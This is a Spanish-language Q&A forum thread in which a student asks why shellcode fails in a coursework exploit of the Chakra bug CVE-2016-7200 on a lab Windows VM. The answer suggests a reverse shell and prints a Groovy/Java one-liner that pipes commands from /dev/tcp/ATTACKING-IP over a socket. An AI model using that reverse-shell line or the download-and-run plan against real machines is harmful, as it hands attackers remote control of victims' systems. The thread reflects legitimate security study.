Problema con el código de shell al explotar Chakra

0

Estudié Seguridad de la Información en la universidad, y obtuvimos en la escuela un proyecto para usar alguna vulnerabilidad parcheada para obtener control sobre la PC. Hemos elegido el chakra exploit CVE-2016-7200. Lo tenemos trabajando para abrir Motepad en la PC de la víctima (una máquina virtual que ejecuta Windows 10 PRO x64 1607). Pero nada más.

Hemos intentado usar shellcode desde aquí pero no funciona. Debería descargar y ejecutar nuestro virus desde el servidor, pero no hace nada. Hemos desactivado el cortafuegos, el defensor, etc. y todavía nada. También probamos algunos códigos de shell en VisualStudio (C / C ++) y cuando teníamos un código de shell trabajando allí (abriendo algo más que Notepad, como calc.exec) pero cuando lo pusimos a cabo en JS no hizo nada (sí, lo cambiamos a formato % u ...).

Si tienes algunas ideas sobre lo que podría estar mal o si tienes algunas sugerencias, por favor, avísame.

    
pregunta user175989 18.04.2018 - 00:33
fuente

1 respuesta

0

Usar código desconocido siempre es arriesgado. Backpatching y etc romperán muchas cosas que no esperas. A menudo, los dispositivos con versiones anteriores de software en realidad se han copiado, pero no hay otra forma de saber que no sea leer los registros de cambios y las versiones.

Dicho esto, intente crear una shell java inversa para el servidor (deberá iniciar una escucha). Si puede obtener una buena shell, tendrá mucha mejor suerte al escribir el script para llamar al virus usted mismo. Honestamente, en el momento en que tenga un shell con privilegios, probablemente pueda completar este desafío.

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor()

Si no ha encontrado esta página, podría ser útil: enlace

    
respondido por el bashCypher 18.04.2018 - 17:34
fuente

Lea otras preguntas en las etiquetas